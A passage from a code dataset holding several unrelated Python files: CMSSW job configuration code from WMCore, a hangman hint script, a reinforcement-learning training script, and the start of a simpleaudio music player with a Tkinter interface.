migrated to the worker node.\n\n \"\"\"\n workingDir = self.stepSpace.location\n jsonPileupConfig = os.path.join(workingDir, \"pileupconf.json\")\n self.logger.info(\"Pileup JSON configuration file: '%s'\", jsonPileupConfig)\n try:\n with open(jsonPileupConfig) as jdata:\n pileupDict = json.load(jdata)\n except IOError:\n m = \"Could not read pileup JSON configuration file: '%s'\" % jsonPileupConfig\n raise RuntimeError(m)\n return pileupDict\n\n def handleProducersNumberOfEvents(self):\n \"\"\"\n _handleProducersNumberOfEvents_\n\n Some producer modules are initialized with a maximum number of events\n to be generated, usually based on the process.maxEvents.input attribute\n but after that is tweaked the producers number of events need to\n be fixed as well. This method takes care of that.\n \"\"\"\n producers = {}\n producers.update(self.process.producers)\n for producer in producers:\n if hasattr(producers[producer], \"nEvents\"):\n producers[producer].nEvents = self.process.maxEvents.input.value()\n\n def handleDQMFileSaver(self):\n \"\"\"\n _handleDQMFileSaver_\n\n Harvesting jobs have the dqmFileSaver EDAnalyzer that must\n be tweaked with the dataset name in order to store it\n properly in the DQMGUI, others tweaks can be added as well\n \"\"\"\n if not hasattr(self.process, \"dqmSaver\"):\n return\n\n runIsComplete = getattr(self.jobBag, \"runIsComplete\", False)\n multiRun = getattr(self.jobBag, \"multiRun\", False)\n runLimits = getattr(self.jobBag, \"runLimits\", \"\")\n self.logger.info(\"DQMFileSaver set to multiRun: %s, runIsComplete: %s, runLimits: %s\",\n multiRun, runIsComplete, runLimits)\n\n self.process.dqmSaver.runIsComplete = cms.untracked.bool(runIsComplete)\n if multiRun and isCMSSWSupported(self.getCmsswVersion(), \"CMSSW_8_0_0\"):\n self.process.dqmSaver.forceRunNumber = cms.untracked.int32(999999)\n if hasattr(self.step.data.application.configuration, \"pickledarguments\"):\n args = pickle.loads(self.step.data.application.configuration.pickledarguments)\n datasetName = args.get('datasetName', None)\n if datasetName:\n if multiRun:\n # then change the dataset name in order to get a different root file name\n datasetName = datasetName.rsplit('/', 1)\n datasetName[0] += runLimits\n datasetName = \"/\".join(datasetName)\n self.process.dqmSaver.workflow = cms.untracked.string(datasetName)\n return\n\n def handleLHEInput(self):\n \"\"\"\n _handleLHEInput_\n\n Enable lazy-download for jobs reading LHE articles from CERN, such\n that these jobs can read data remotely\n \"\"\"\n if getattr(self.jobBag, \"lheInputFiles\", False):\n self.logger.info(\"Enabling 'lazy-download' for lheInputFiles job\")\n self.process.add_(cms.Service(\"SiteLocalConfigService\",\n overrideSourceCacheHintDir=cms.untracked.string(\"lazy-download\")))\n\n return\n\n def handleRepackSettings(self):\n \"\"\"\n _handleRepackSettings_\n\n Repacking small events is super inefficient reading directly from EOS.\n \"\"\"\n self.logger.info(\"Hardcoding read/cache strategies for repack\")\n self.process.add_(\n cms.Service(\"SiteLocalConfigService\",\n overrideSourceCacheHintDir=cms.untracked.string(\"lazy-download\")\n )\n )\n\n return\n\n def handleSingleCoreOverride(self):\n \"\"\"\n _handleSingleCoreOverride_\n\n Make sure job only uses one core and one stream in CMSSW\n \"\"\"\n try:\n if int(self.step.data.application.multicore.numberOfCores) > 1:\n self.step.data.application.multicore.numberOfCores = 1\n except AttributeError:\n pass\n\n try:\n if int(self.step.data.application.multicore.eventStreams) > 0:\n self.step.data.application.multicore.eventStreams = 0\n except AttributeError:\n pass\n\n return\n\n def handleSpecialCERNMergeSettings(self, funcName):\n \"\"\"\n _handleSpecialCERNMergeSettings_\n\n CERN has a 30ms latency between Meyrin and Wigner, which kills merge performance\n Enable lazy-download for fastCloning for all CMSSW_7_5 jobs (currently off)\n Enable lazy-download for all merge jobs\n \"\"\"\n if self.getCmsswVersion().startswith(\"CMSSW_7_5\") and False:\n self.logger.info(\"Using fastCloning/lazydownload\")\n self.process.add_(cms.Service(\"SiteLocalConfigService\",\n overrideSourceCloneCacheHintDir=cms.untracked.string(\"lazy-download\")))\n elif funcName == \"merge\":\n self.logger.info(\"Using lazydownload\")\n self.process.add_(cms.Service(\"SiteLocalConfigService\",\n overrideSourceCacheHintDir=cms.untracked.string(\"lazy-download\")))\n return\n\n def handleCondorStatusService(self):\n \"\"\"\n _handleCondorStatusService_\n\n Enable CondorStatusService for CMSSW releases that support it.\n \"\"\"\n if isCMSSWSupported(self.getCmsswVersion(), \"CMSSW_7_6_0\"):\n self.logger.info(\"Tag chirp updates from CMSSW with step %s\", self.step.data._internal_name)\n self.process.add_(cms.Service(\"CondorStatusService\",\n tag=cms.untracked.string(\"_%s_\" % self.step.data._internal_name)))\n\n return\n\n def handleEnforceGUIDInFileName(self, secondaryInput=None):\n \"\"\"\n _handleEnforceGUIDInFileName_\n\n Enable enforceGUIDInFileName for CMSSW releases that support it.\n \"\"\"\n # skip it for CRAB jobs\n if self.crabPSet:\n return\n\n if secondaryInput:\n inputSource = secondaryInput\n self.logger.info(\"Evaluating enforceGUIDInFileName parameter for secondary input data.\")\n else:\n inputSource = self.process.source\n\n # only enable if source is PoolSource or EmbeddedRootSource\n if inputSource.type_() not in [\"PoolSource\", \"EmbeddedRootSource\"]:\n self.logger.info(\"Not evaluating enforceGUIDInFileName parameter for process source %s\",\n inputSource.type_())\n return\n\n self.logger.info(\"Evaluating if release %s supports enforceGUIDInFileName parameter...\",\n self.getCmsswVersion())\n\n # enable if release supports enforceGUIDInFileName\n if isEnforceGUIDInFileNameSupported(self.getCmsswVersion()):\n # check to make sure primary input files follow guid naming convention\n # prevents enabling guid checks on some workflows (StoreResults/StepChain) that use custom input file names\n # EmbeddedRootSource input files will always follow guid naming convention\n if inputSource.type_() == \"PoolSource\" and inputSource.fileNames:\n guidRegEx = re.compile(\"[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}.root$\")\n if not guidRegEx.search(inputSource.fileNames[0]):\n self.logger.info(\"Not enabling enforceGUIDInFileName due to non-GUID input file names\")\n return\n self.logger.info(\"Setting enforceGUIDInFileName to True.\")\n inputSource.enforceGUIDInFileName = cms.untracked.bool(True)\n else:\n self.logger.info(\"CMSSW release does not support enforceGUIDInFileName.\")\n\n return\n\n def getCmsswVersion(self):\n \"\"\"\n _getCmsswVersion_\n\n Return a string representing the CMSSW version to be used.\n \"\"\"\n if not self.crabPSet:\n return self.step.data.application.setup.cmsswVersion\n else:\n # CRAB3 needs to use an environment var to get the version\n return os.environ.get(\"CMSSW_VERSION\", \"\")\n\n def __call__(self):\n \"\"\"\n _call_\n\n Examine the step configuration and construct a PSet from that.\n\n \"\"\"\n self.logger.info(\"Executing SetupCMSSWPSet...\")\n self.jobBag = self.job.getBaggage()\n\n scenario = getattr(self.step.data.application.configuration, \"scenario\", None)\n if scenario is not None and scenario != \"\":\n self.logger.info(\"Setting up job scenario/process\")\n funcName = getattr(self.step.data.application.configuration, \"function\", None)\n if getattr(self.step.data.application.configuration, \"pickledarguments\", None) is not None:\n funcArgs = pickle.loads(self.step.data.application.configuration.pickledarguments)\n else:\n funcArgs = {}\n try:\n self.createProcess(scenario, funcName, funcArgs)\n except Exception as ex:\n self.logger.exception(\"Error creating process for Config/DataProcessing:\")\n raise ex\n\n if funcName == \"repack\":\n self.handleRepackSettings()\n\n if funcName in [\"merge\", \"alcaHarvesting\"]:\n self.handleSingleCoreOverride()\n\n if socket.getfqdn().endswith(\"cern.ch\"):\n self.handleSpecialCERNMergeSettings(funcName)\n\n else:\n try:\n self.loadPSet()\n except Exception as ex:\n self.logger.exception(\"Error loading PSet:\")\n raise ex\n\n # Check process.source exists\n if getattr(self.process, \"source\", None) is None:\n msg = \"Error in CMSSW PSet: process is missing attribute 'source'\"\n msg += \" or process.source is defined with None value.\"\n self.logger.error(msg)\n raise RuntimeError(msg)\n\n self.handleCondorStatusService()\n\n self.fixupProcess()\n\n # In case of CRAB3, the number of threads in the PSet should not be overridden\n if not self.crabPSet:\n try:\n origCores = int(getattr(self.step.data.application.multicore, 'numberOfCores', 1))\n eventStreams = int(getattr(self.step.data.application.multicore, 'eventStreams', 0))\n resources = {'cores': origCores}\n resizeResources(resources)\n numCores = resources['cores']\n if numCores != origCores:\n self.logger.info(\n \"Resizing a job with nStreams != nCores. Setting nStreams = nCores. This may end badly.\")\n eventStreams = 0\n options = getattr(self.process, \"options\", None)\n if options is None:\n self.process.options = cms.untracked.PSet()\n options = getattr(self.process, \"options\")\n options.numberOfThreads = cms.untracked.uint32(numCores)\n options.numberOfStreams = cms.untracked.uint32(eventStreams)\n except AttributeError as ex:\n self.logger.error(\"Failed to override numberOfThreads: %s\", str(ex))\n\n psetTweak = getattr(self.step.data.application.command, \"psetTweak\", None)\n if psetTweak is not None:\n self.applyPSetTweak(psetTweak, self.fixupDict)\n\n # Apply task level tweaks\n taskTweak = makeTaskTweak(self.step.data)\n applyTweak(self.process, taskTweak, self.fixupDict)\n\n # Check if chained processing is enabled\n # If not - apply the per job tweaks\n # If so - create an override TFC (like done in PA) and then modify thePSet accordingly\n if hasattr(self.step.data.input, \"chainedProcessing\") and self.step.data.input.chainedProcessing:\n self.handleChainedProcessing()\n else:\n # Apply per job PSet Tweaks\n jobTweak = makeJobTweak(self.job)\n applyTweak(self.process, jobTweak, self.fixupDict)\n\n # check for pileup settings presence, pileup support implementation\n # and if enabled, process pileup configuration / settings\n if hasattr(self.step.data, \"pileup\"):\n self.handlePileup()\n\n # Apply per output module PSet Tweaks\n cmsswStep = self.step.getTypeHelper()\n for om in cmsswStep.listOutputModules():\n mod = cmsswStep.getOutputModule(om)\n outTweak = makeOutputTweak(mod, self.job)\n applyTweak(self.process, outTweak, self.fixupDict)\n\n # revlimiter for testing\n if getattr(self.step.data.application.command, \"oneEventMode\", False):\n self.process.maxEvents.input = 1\n\n # check for random seeds and the method of seeding which is in the job baggage\n self.handleSeeding()\n\n # make sure default parametersets for perf reports are installed\n self.handlePerformanceSettings()\n\n # check for event numbers in the producers\n self.handleProducersNumberOfEvents()\n\n # fixup the dqmFileSaver\n self.handleDQMFileSaver()\n\n # tweak for jobs reading LHE articles from CERN\n self.handleLHEInput()\n\n # tweak jobs for enforceGUIDInFileName\n self.handleEnforceGUIDInFileName()\n\n # Check if we accept skipping bad files\n if hasattr(self.step.data.application.configuration, \"skipBadFiles\"):\n self.process.source.skipBadFiles = \\\n cms.untracked.bool(self.step.data.application.configuration.skipBadFiles)\n\n # Apply events per lumi section if available\n if hasattr(self.step.data.application.configuration, \"eventsPerLumi\"):\n self.process.source.numberEventsInLuminosityBlock = \\\n cms.untracked.uint32(self.step.data.application.configuration.eventsPerLumi)\n\n # limit run time if desired\n if hasattr(self.step.data.application.configuration, \"maxSecondsUntilRampdown\"):\n self.process.maxSecondsUntilRampdown = cms.untracked.PSet(\n input=cms.untracked.int32(self.step.data.application.configuration.maxSecondsUntilRampdown))\n\n # accept an overridden TFC from the step\n if hasattr(self.step.data.application, 'overrideCatalog'):\n self.logger.info(\"Found a TFC override: %s\", self.step.data.application.overrideCatalog)\n self.process.source.overrideCatalog = \\\n cms.untracked.string(self.step.data.application.overrideCatalog)\n\n configFile = self.step.data.application.command.configuration\n configPickle = getattr(self.step.data.application.command, \"configurationPickle\", \"PSet.pkl\")\n workingDir = self.stepSpace.location\n try:\n with open(\"%s/%s\" % (workingDir, configPickle), 'wb') as pHandle:\n pickle.dump(self.process, pHandle)\n\n with open(\"%s/%s\" % (workingDir, configFile), 'w') as handle:\n handle.write(\"import FWCore.ParameterSet.Config as cms\\n\")\n handle.write(\"import pickle\\n\")\n handle.write(\"with open('%s', 'rb') as handle:\\n\" % configPickle)\n handle.write(\" process = pickle.load(handle)\\n\")\n except Exception as ex:\n self.logger.exception(\"Error writing out PSet:\")\n raise ex\n self.logger.info(\"CMSSW PSet setup completed!\")\n\n return 0\n","sub_path":"src/python/WMCore/WMRuntime/Scripts/SetupCMSSWPset.py","file_name":"SetupCMSSWPset.py","file_ext":"py","file_size_in_byte":34326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"582069396","text":"myWord = \"hello\"\r\n\r\nchoice = input(\"Type a word: \")\r\n\r\nif choice == myWord:\r\n\tprint(\"It's a match\")\r\nelse:\r\n\tprint(\"Not a match\")\r\n\r\n# how to check if a letter is in a word\r\nletter = input(\"Type a letter\")\r\nif letter in myWord:\r\n\tprint(\"Letter is in the word\")\r\nelse:\r\n\tprint(\"Letter is not in the word\")\r\n\r\ncount = 0\r\nfor s in myWord:\r\n\tif s == letter:\r\n\t\tprint(count)\r\n\tcount += 1","sub_path":"HangManHints.py","file_name":"HangManHints.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"154873595","text":"# coding:utf-8\nimport time\nimport argparse\nimport tensorflow as tf\nfrom utils import get_time, plot_results\nfrom Agent import Agent\nfrom EADQN import DeepQLearner\nfrom cEnvironment import Environment\nfrom ReplayMemory import ReplayMemory\nfrom gensim.models import KeyedVectors\nfrom tqdm import tqdm\nfrom keras.backend import set_image_data_format\nfrom keras.backend.tensorflow_backend import set_session\nfrom flair.embeddings import WordEmbeddings, FlairEmbeddings, StackedEmbeddings, ELMoEmbeddings, BertEmbeddings, BPEmb, CharacterEmbeddings\n\n\ndef preset_args():\n parser = argparse.ArgumentParser()\n\n envarg = parser.add_argument_group('Environment')\n envarg.add_argument(\"--domain\", type=str, default='cooking', help=\"\")\n envarg.add_argument(\"--contextual_embedding\", type=str, default='elmo', help=\"\")\n envarg.add_argument(\"--model_dim\", type=str, default=50, help=\"embedding dimension\") # word2vec 50.\n envarg.add_argument(\"--num_words\", type=int, default=500, help=\"number of words to consider for act model is 500. Arg model is 100\") # 100 if arguments.\n envarg.add_argument(\"--context_len\", type=int, default=100, help=\"\")\n envarg.add_argument(\"--word_dim\", type=int, default=868, help=\"dim of word embedding\")\n envarg.add_argument(\"--tag_dim\", type=int, default=868, help=\"\")\n envarg.add_argument(\"--dis_dim\", type=int, default=868, help=\"\")\n envarg.add_argument(\"--reward_assign\", type=list, default=[1, 2, 3], help='')\n envarg.add_argument(\"--reward_base\", type=float, default=50.0, help=\"\")\n envarg.add_argument(\"--object_rate\", type=float, default=0.07, help='')\n envarg.add_argument(\"--action_rate\", type=float, default=0.10, help=\"\")\n envarg.add_argument(\"--use_act_rate\", type=int, default=1, help='')\n\n memarg = parser.add_argument_group('Replay memory')\n memarg.add_argument(\"--positive_rate\", type=float, default=0.9, help=\"\")\n memarg.add_argument(\"--priority\", type=int, default=1, help=\"\")\n memarg.add_argument(\"--save_replay\", type=int, default=0, help=\"\")\n memarg.add_argument(\"--load_replay\", type=int, default=0, help=\"\")\n memarg.add_argument(\"--replay_size\", type=int, default=50000, help=\"\")\n memarg.add_argument(\"--save_replay_size\", type=int, default=1000, help=\"\")\n memarg.add_argument(\"--save_replay_name\", type=str, default='data/saved_replay_memory.pkl', help=\"\")\n\n netarg = parser.add_argument_group('Deep Q-learning network')\n netarg.add_argument(\"--batch_size\", type=int, default=32, help=\"\")\n netarg.add_argument(\"--num_filters\", type=int, default=32, help=\"\")\n netarg.add_argument(\"--dense_dim\", type=int, default=256, help=\"\")\n netarg.add_argument(\"--num_actions\", type=int, default=2, help=\"\")\n netarg.add_argument(\"--optimizer\", type=str, default='adam', help=\"\")\n netarg.add_argument(\"--learning_rate\", type=float, default=0.001, help=\"\")\n netarg.add_argument(\"--dropout\", type=float, default=0.5, help=\"\")\n netarg.add_argument(\"--gamma\", type=float, default=0.9, help=\"\")\n\n antarg = parser.add_argument_group('Agent')\n antarg.add_argument(\"--exploration_rate_start\", type=float, default=1, help=\"\")\n antarg.add_argument(\"--exploration_rate_end\", type=float, default=0.1, help=\"\")\n antarg.add_argument(\"--exploration_rate_test\", type=float, default=0.0, help=\"\")\n antarg.add_argument(\"--exploration_decay_steps\", type=int, default=1000, help=\"\")\n antarg.add_argument(\"--train_frequency\", type=int, default=1, help=\"\")\n antarg.add_argument(\"--train_repeat\", type=int, default=1, help=\"\")\n antarg.add_argument(\"--target_steps\", type=int, default=5, help=\"\")\n antarg.add_argument(\"--random_play\", type=int, default=0, help=\"\")\n antarg.add_argument(\"--display_training_result\", type=int, default=1, help='')\n antarg.add_argument(\"--filter_act_ind\", type=int, default=1, help='')\n\n mainarg = parser.add_argument_group('Main loop')\n mainarg.add_argument(\"--gui_mode\", type=bool, default=False, help='')\n mainarg.add_argument(\"--epochs\", type=int, default=1, help=\"\")\n mainarg.add_argument(\"--start_epoch\", type=int, default=0, help=\"\")\n mainarg.add_argument(\"--stop_epoch_gap\", type=int, default=5, help=\"\")\n mainarg.add_argument(\"--train_episodes\", type=int, default=50, help=\"\")\n mainarg.add_argument(\"--load_weights\", type=bool, default=False, help=\"\")\n mainarg.add_argument(\"--save_weights\", type=bool, default=True, help=\"\")\n mainarg.add_argument(\"--agent_mode\", type=str, default='act', help='action dqn or argument dqn')\n\n\n return parser.parse_args()\n\ndef args_init(args):\n # initialize word2vec\n args.word2vec = KeyedVectors.load_word2vec_format('data/mymodel-new-5-%d' % args.model_dim, binary=True)\n\n # initialize contextual embedding dimensions\n if args.contextual_embedding == 'word2vec':\n args.word_dim = args.tag_dim = args.dis_dim = 50\n args.stacked_embeddings = 'word2vec'\n elif args.contextual_embedding == 'elmo': #glove + elmo\n args.word_dim = args.tag_dim = args.dis_dim = 868\n ## stacked embeddings\n # create a StackedEmbedding object that combines glove and forward/backward flair embeddings\n args.stacked_embeddings = StackedEmbeddings([\n WordEmbeddings('glove'),\n ELMoEmbeddings('small')\n ])\n\n elif args.contextual_embedding == 'bert': #glove + bert\n args.word_dim = args.tag_dim = args.dis_dim = 3172\n args.stacked_embeddings = StackedEmbeddings([\n WordEmbeddings('glove'),\n BertEmbeddings('bert-base-uncased')\n ])\n args.batch_size = 8\n\n elif args.contextual_embedding == 'flair': #glove + flair-forward + flair-backward\n args.word_dim = args.tag_dim = args.dis_dim = 4196\n args.stacked_embeddings = StackedEmbeddings([\n WordEmbeddings('glove'),\n FlairEmbeddings('mix-forward', chars_per_chunk=128),\n FlairEmbeddings('mix-backward', chars_per_chunk=128)\n ])\n if args.agent_mode == 'act':\n args.batch_size = 8\n else:\n args.batch_size = 8\n\n elif args.contextual_embedding == 'glove': # not tested\n args.word_dim = args.tag_dim = args.dis_dim = 100\n args.stacked_embeddings = StackedEmbeddings([\n WordEmbeddings('glove'),\n ])\n\n # weights loaded, set exploration rate to minimum\n if args.load_weights: # 1 to 0.1. decayed to minimum.\n args.exploration_rate_start = args.exploration_rate_end\n\n # agent mode arguments, set number of words to 100\n if args.agent_mode == 'arg':\n args.num_words = args.context_len\n args.display_training_result = 0\n\n args.result_dir = 'results/%s_%s_%s' % (args.domain, args.agent_mode, args.contextual_embedding)\n\n return args\n\ndef main(args):\n print('Current time is: %s' % get_time())\n print('Starting at main...')\n result = {'rec': [], 'pre': [], 'f1': [], 'rw': []}\n\n start = time.time()\n\n config = tf.compat.v1.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config)) # global Keras session\n\n env_act = Environment(args, args.agent_mode)\n net_act = DeepQLearner(args, args.agent_mode, 'channels_last')\n mem_act = ReplayMemory(args, args.agent_mode)\n agent = Agent(env_act, mem_act, net_act, args) # agent takes in environment, memory, model and agent_mode\n\n # loop over epochs\n epoch_result = {'rec': [0.0], 'pre': [0.0], 'f1': [0.0], 'rw': [0.0]}\n training_result = {'rec': [], 'pre': [], 'f1': [], 'loss': [], 'rw': []}\n test_result = {'rec': [], 'pre': [], 'f1': [], 'loss': [], 'rw': []}\n log_epoch = 0\n\n\n # if we are loading weights, we don't need to train [no exploration is required. We have exploration rate start = end = 0.1], just test on test set.\n if args.load_weights:\n print('Loading weights ...')\n filename = 'weights/%s_%s_%s.h5' % (args.domain, args.agent_mode, args.contextual_embedding)\n net_act.load_weights(filename)\n #accuracy on test set\n with open(\"%s.txt\" % (args.result_dir + 'testset'), 'w') as outfile:\n rec, pre, f1, rw = agent.test(args.test_steps, outfile, test_flag=True)\n outfile.write('\\n\\n Test f1 value: {}, recall : {}, precision : {}, reward: {} \\n'.format(f1, rec,pre,rw ))\n print('\\n\\n Test f1 value: {}, recall : {}, precision : {}, reward: {} \\n'.format(f1, rec,pre,rw ))\n\n if not args.load_weights:\n with open(\"%s.txt\" % (args.result_dir), 'w') as outfile:\n print('\\n Arguments:')\n outfile.write('\\n Arguments:\\n')\n for k, v in sorted(args.__dict__.items(), key=lambda x: x[0]):\n print('{}: {}'.format(k, v))\n outfile.write('{}: {}\\n'.format(k, v))\n print('\\n')\n outfile.write('\\n')\n\n # do training\n\n for epoch in tqdm(range(args.start_epoch, args.start_epoch + args.epochs)):\n num_test = -1\n env_act.train_epoch_end_flag = False\n while not env_act.train_epoch_end_flag: #unless all documents are covered\n # training\n num_test += 1\n restart_init = False if num_test > 0 else True\n tmp_result = agent.train(args.train_steps, args.train_episodes, restart_init) #Train episodes = 50 , max episodes.\n for k in training_result:\n training_result[k].extend(tmp_result[k])\n\n rec, pre, f1, rw = agent.test(args.valid_steps, outfile) # not testing; actually validation\n\n if f1 > max(epoch_result['f1']):\n if args.save_weights:\n filename = 'weights/%s_%s_%s.h5' % (args.domain, args.agent_mode, args.contextual_embedding)\n net_act.save_weights(filename)\n\n epoch_result['f1'].append(f1)\n epoch_result['rec'].append(rec)\n epoch_result['pre'].append(pre)\n epoch_result['rw'].append(rw)\n log_epoch = epoch\n outfile.write('\\n\\n Best f1 value: {} best epoch: {}\\n'.format(epoch_result, log_epoch))\n print('\\n\\n Best f1 value: {} best epoch: {}\\n'.format(epoch_result, log_epoch))\n\n # if no improvement after args.stop_epoch_gap, break\n # EARLY STOPPING\n if epoch - log_epoch >= args.stop_epoch_gap:\n outfile.write('\\n\\nBest f1 value: {} best epoch: {}\\n'.format(epoch_result, log_epoch))\n print('\\nepoch: %d result_dir: %s' % (epoch, args.result_dir))\n print('-----Early stopping, no improvement after %d epochs-----\\n' % args.stop_epoch_gap)\n break\n\n # if args.save_replay: #0 by default\n # mem_act.save(args.save_replay_name, args.save_replay_size)\n\n filename = '%s_training_process.pdf' % (args.result_dir)\n plot_results(epoch_result, args.domain, filename)\n outfile.write('\\n\\n training process:\\n{}\\n\\n'.format(epoch_result))\n\n best_ind = epoch_result['f1'].index(max(epoch_result['f1']))\n for k in epoch_result:\n result[k].append(epoch_result[k][best_ind])\n outfile.write('{}: {}\\n'.format(k, result[k]))\n print(('{}: {}\\n'.format(k, result[k])))\n avg_f1 = sum(result['f1']) / len(result['f1'])\n avg_rw = sum(result['rw']) / len(result['rw'])\n outfile.write('\\nAvg f1: {} Avg reward: {}\\n'.format(avg_f1, avg_rw))\n print('\\nAvg f1: {} Avg reward: {}\\n'.format(avg_f1, avg_rw))\n\n tf.compat.v1.reset_default_graph()\n end = time.time()\n print('Total time cost: %ds' % (end - start))\n print('Current time is: %s\\n' % get_time())\n\nif __name__ == '__main__':\n args = args_init(preset_args())\n set_image_data_format('channels_last')\n main(args)\n\n","sub_path":"cmain.py","file_name":"cmain.py","file_ext":"py","file_size_in_byte":12083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"127314558","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nProject: Harmony is digital\nAuthors: Capucine Foucher and Emma Desté\nPromo: EFREI 2025\nRole: this is the main file in charge of :\n- setting the graphic interface,\n- read songs collection from a file,\n- write songs collection in a file,\n- create digital sound using numpy,\n- play sound using simpleaudio.\n\"\"\"\n\nfrom util_notes import *\n\nimport tkinter as tk\nfrom tkinter import Canvas\n\nimport simpleaudio as sa\nimport simpleaudio.functionchecks as fc\n\nimport numpy as np\nfrom numpy import pi\n\nfrom math import sqrt\n\nimport re # regular expression to clean special characters (here carriage return)\n\n# Creation of global variables\n# Simpleaudio variables\nglob_po = 0 # simpleaudio playable object\nsample_rate = 44100 # audio signal is sliced 44100 times per second\n\n# General usage global variable\nglob_collection = [] # all songs in a list of [(tile1, partition1),(title2, partition2),...]\nglob_croche_duration = 0.125 # a croche has a musical duration of 125ms, linked to glob_croche_dur_sv\n\n# Graphic interface variables\nglob_root = tk.Tk()\nglob_lbsong = 0 # listbox with all songs title\nglob_canvas1 = 0 # graphical display of the note beginning\nglob_canvas2 = 0 # graphical display of the entire note\nglob_instrum = tk.StringVar() # instrument name, e.g. \"Organ\"\nglob_inv = tk.StringVar() # inversion ticked box\nglob_transpo = tk.StringVar() # input area for the transposition value, e.g. \"0\" means no transposition\nglob_croche_dur_sv = tk.StringVar() # input area for the croche duration in ms, e.g. \"125\" means 0.125s\n\n\n# Simpleaudio functions\n\ndef sound_test_loudspeakers():\n \"\"\"\n Sound test on left and right loudspeakers\n :return None, drive the audio output\n effect on the program: audible sound played\n \"\"\"\n fc.LeftRightCheck.run()\n\n\ndef sound_test_superposition():\n \"\"\"\n Sound test on superposition of notes\n :return None, drive the audio output\n effect on the program: multiple audible sounds played\n \"\"\"\n fc.OverlappingCheck.run()\n\n\ndef play_note(frequence, musical_duration):\n \"\"\"\n Create the sound of a note based on its frequency, its duration and the instrument used\n :param int frequence: frequency in Hertz\n :param int musical_duration: duration of a note, e.g. 2 for croche, 16 for ronde\n :return None, drive the audio output\n effect on the program: audible sound played\n \"\"\"\n global glob_po\n duration = (musical_duration * glob_croche_duration) / 2 # code duration of croche is 2\n time = np.linspace(0, duration, int(duration * sample_rate), False) # time is a list of time\n # False because we want 1/sample_rate between each value\n if frequence > 0:\n if glob_instrum.get() == \"Sinus\":\n signal = np.sin(frequence * time * 2 * pi)\n elif glob_instrum.get() == \"Rectangles\":\n signal = np.sign(np.sin(time * 2 * pi * frequence))\n elif glob_instrum.get() == \"Organ\":\n signal = 0.4 * (np.sin(time * 2 * pi * frequence)) + 0.5 * (\n np.sin(time * 2 * pi * (frequence / 4))) + 0.1 * (np.sin(time * 2 * pi * (frequence * 4)))\n elif glob_instrum.get() == \"UFO\":\n signal = 0.2 * (np.sin(time * 2 * pi * frequence)) + 0.4 * (\n np.sin(time * 2 * pi * (frequence / sqrt(2)))) + 0.4 * (np.sin(time * 2 * pi * (frequence * sqrt(2))))\n else:\n print(\"Erreur : instrument inconnu\")\n return\n else: # to play nothing (silence)\n signal = time * 0.0 # to generate a flat signal\n\n # envelope : important to differentiate two following same notes (with ears)\n # TODO improved envelope using https: // fr.wikipedia.org / wiki / Enveloppe_sonore\n envelope = np.exp(-time * 3)\n signal = signal * envelope\n draw(signal) # when we are between -1 and 1\n\n tone = signal * 8388607 # 8388607 = 2^23 : to stretch -1,1 to 24 bits\n tone = tone.astype(np.int32) # transform list of floats to list of integers on 32 bits\n\n i = 0\n byte_array = []\n for b in tone.tobytes():\n if i % 4 != 3: # to keep only 3 bytes on 4\n byte_array.append(b)\n i += 1\n audio = bytearray(byte_array)\n\n glob_po = sa.play_buffer(audio, 1, 3, sample_rate) # playobject\n # 1 = number of audio channel : mono,\n # 3 = number of bytes : 3 bytes = 24 bits\n\n if glob_po != 0: # wait for the end of a potential previous note\n glob_po.wait_done()\n\n\ndef play_notes(frequence, duration):\n \"\"\"\n Create the sound of each notes based on its frequency and its duration using the function play_note\n :param int frequence: frequency in Hertz\n :param int duration: list of duration of notes, e.g. [2,16] for 1 croche and 1 ronde\n :return None, drive the audio output\n effect on the program: sound of notes played\n \"\"\"\n for i in range(len(frequence)):\n play_note(frequence[i], duration[i])\n\n\n# General usage functions\n\ndef exists_title(title):\n \"\"\"\n Detects if a title already exists in the collection\n :param str title: title of the searched song\n :return if the title given in parameter already exists\n :rtype boolean\n effect on the program: the function will tell to addition_if_needed if a new title need to appear\n \"\"\"\n for song in glob_collection:\n if title == song[0]:\n return True\n return False\n\n\ndef addition_if_needed(song):\n \"\"\"\n Detect a new song and add it in the collection, add its title in the listbox and place the cursor on it\n :param tuple song: song containing (title, partition)\n :return None, directly add the song to glob_collection\n effect on the program: update the list of songs and override text file with the updated collection\n \"\"\"\n global glob_collection, glob_lbsong\n (title, part) = song\n if exists_title(title) == False:\n glob_collection.append(song)\n glob_lbsong.insert(tk.END, title) # tk.END is a defined constant that we add at the end of a list\n glob_lbsong.select_clear(0, tk.END) # to deselect all\n glob_lbsong.select_set(tk.END) # to select the title of the song going on\n glob_lbsong.see(tk.END) # to bring the scroll bar on the selected title\n write_collection(\"partitions.txt\") # to add the song to the collection\n\n\ndef file_reading(file_name):\n \"\"\"\n Create a collection of songs by reading by pairs of lines the file\n :param str file_name: name of the file that has to be read\n :return collection: collection of the songs contained in the file\n :rtype list\n effect on the program: create a collection of songs [(title1, partition1),(title2, partition2),...]\n \"\"\"\n collection = []\n file = open(file_name, \"r\", encoding=\"utf-8\") # indicate \"r\"ead only\n line1 = file.readline()\n # https://qastack.fr/programming/5843518/remove-all-special-characters-punctuation-and-spaces-from-string\n line1 = re.sub('[^A-Za-z0-9 èéêâ?!#\\'\\-]+', '',\n line1) # + means it replace special characters present at least once\n line2 = file.readline()\n line2 = re.sub('[^A-Za-z0-9 ]+', '', line2)\n while line2 != \"\": # to avoid end of lines and end of files, specific for Mac\n collection.append((line1,\n line2)) # the last character of the line is a carriage return. /!\\ carriage return has a different coding on Windows and on Mac\n line1 = file.readline()\n line1 = re.sub('[^A-Za-z0-9 èéêâ?!#\\'\\-]+', '', line1)\n line2 = file.readline()\n line2 = re.sub('[^A-Za-z0-9 ]+', '', line2)\n file.close()\n return collection\n\n\ndef write_collection(file_name):\n \"\"\"\n Create a text file with the collection of songs by writing pairs of lines\n :param str file_name: name of the file that has to be written\n :return None, create and write in a text file\n effect on the program: override the file containing collection of songs\n \"\"\"\n global glob_collection\n file = open(file_name, 'w', encoding=\"utf-8\") # 'w' open for writing\n for song in glob_collection:\n (title, part) = song\n file.write(title + 